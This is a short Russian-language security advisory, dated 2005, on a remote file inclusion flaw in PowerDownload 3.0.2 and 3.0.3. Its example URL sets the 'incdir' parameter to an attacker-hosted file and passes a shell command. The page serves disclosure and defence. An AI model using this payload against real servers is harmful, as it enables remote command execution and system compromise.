Security Lab

PHP-инклюдинг в PowerDownload

Дата публикации:01.06.2005
Всего просмотров:942
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: PowerDownload 3.x
Уязвимые версии: PowerDownload 3.0.2, 3.0.3

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Уязвимость существует из-за недостаточной проверки входных данных в переменной 'incdir' сценария 'pdl-inc/pdl_header.inc.php'. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный php файл. Пример:

http://[target]/download/downloads.php?release_id=
650&incdir=http://[attacke]/cmd.gif?&cmd=uname%20-a

URL производителя: www.powerscripts.org/?page=projects&projectid=6

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PowerDownload Remote File Inclusion